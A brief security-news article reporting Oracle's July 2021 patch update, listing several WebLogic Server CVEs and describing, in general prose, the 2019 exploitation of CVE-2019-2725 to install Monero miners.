New Oracle WebLogic Server vulnerabilities were just reported with the Critical Patch Update for July 2021. 342 issues were fixed across multiple Oracle products, some of which remotely exploitable and enabling attackers to take control of vulnerable systems.
CVE-2019-2729 in Oracle WebLogic Server Web Services
The most critical of all issues appears to be CVE-2019-2729, a critical deserialization flaw via XMLDecoder and Oracle WebLogic Server Web Services. The bug can be deployed in remote attacks without the need of any authentication. For example, it may be exploited over a network without the need for a username and password, Oracle noted in its advisory.
“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible,” the company added. The vulnerability was first reported in 2019, when it was addressed in an out-of-band patch.
Oracle also fixed six other issues in its WebLogic Server, three of which rated 9.8 out of 10 on the CVSS scale. Here’s the list of the vulnerabilities: CVE-2021-2394, CVE-2021-2397, CVE-2021-2382, CVE-2021-2378, CVE-2021-2376, and CVE-2021-2403.
Oracle has fixed various flaws in many of its products over the years. One of them, CVE-2019-2725, also in the Oracle WebLogic Server application, was abused in 2019 by hackers to drop Monero miners. Using the flaw, remote attackers could start a PowerShell command on the server to trigger a payload download of a certificate file to the host. The certification utility would then decode the contents of the file, and eventually lead to an uncompressed file.